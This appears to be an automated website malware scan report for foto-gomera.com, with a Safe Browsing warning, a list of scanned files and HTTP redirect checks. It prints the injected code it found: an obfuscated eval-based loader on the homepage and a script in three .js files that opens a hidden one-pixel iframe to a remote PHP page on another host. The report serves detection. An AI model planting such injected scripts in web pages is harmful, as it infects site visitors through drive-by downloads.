Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=foto-gomera.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://foto-gomera.com/ | 200 OK Content-Length: 10995 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=202;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,117,104,105,98,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,24,25,26,27,113,105,106,99,41,106,106,92,26 Antivirus reports:
| ||
http://foto-gomera.com/md8_history.js | 200 OK Content-Length: 20115 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function() { var a = document.createElement('iframe'); a.src = 'http://foxdesign.home.pl//wp-admin/user/cnt.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('adpl')) { document.write('<div id=\'adpl\'></div>'); document.getElementById('adpl').appendChild(a); } })(); Antivirus reports:
| ||
http://foto-gomera.com/md8_design.js | 200 OK Content-Length: 3584 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function() { var a = document.createElement('iframe'); a.src = 'http://foxdesign.home.pl//wp-admin/user/cnt.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('adpl')) { document.write('<div id=\'adpl\'></div>'); document.getElementById('adpl').appendChild(a); } })(); Antivirus reports:
| ||
http://foto-gomera.com/md8lib.js | 200 OK Content-Length: 43739 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function() { var a = document.createElement('iframe'); a.src = 'http://foxdesign.home.pl//wp-admin/user/cnt.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('adpl')) { document.write('<div id=\'adpl\'></div>'); document.getElementById('adpl').appendChild(a); } })(); Antivirus reports:
| ||
http://foto-gomera.com/test404page.js | 200 OK Content-Length: 226 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: foto-gomera.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 21:04:32 GMT
ETag: "755f5a3-2af3-4d0eb54890340"
Server: Apache
Vary: Accept-Encoding
Content-Length: 10995
Content-Type: text/html
Last-Modified: Sat, 15 Dec 2012 22:04:21 GMT
X-Handling: relax
X-UD-Host: webspace.udag.de
X-UD-Loopcounter: 3
X-UD-Method: urlhiding
X-UD-REMOTE_ADDR: 78.158.11.226
X-UD-Target: http://www.infogomera.com/fotogomeracom
...10995 bytes of data.
GET / HTTP/1.1
Host: foto-gomera.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 21:04:32 GMT
ETag: "755f5a3-2af3-4d0eb54890340"
Server: Apache
Vary: Accept-Encoding
Content-Length: 10995
Content-Type: text/html
Last-Modified: Sat, 15 Dec 2012 22:04:21 GMT
X-Handling: relax
X-UD-Host: webspace.udag.de
X-UD-Loopcounter: 3
X-UD-Method: urlhiding
X-UD-REMOTE_ADDR: 78.158.11.226
X-UD-Target: http://www.infogomera.com/fotogomeracom
...10995 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: foto-gomera.com
Referer: http://www.google.com/search?q=foto-gomera.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: foto-gomera.com
Referer: http://www.google.com/search?q=foto-gomera.com
Result:
The result is similar to the first query. There are no suspicious redirects found.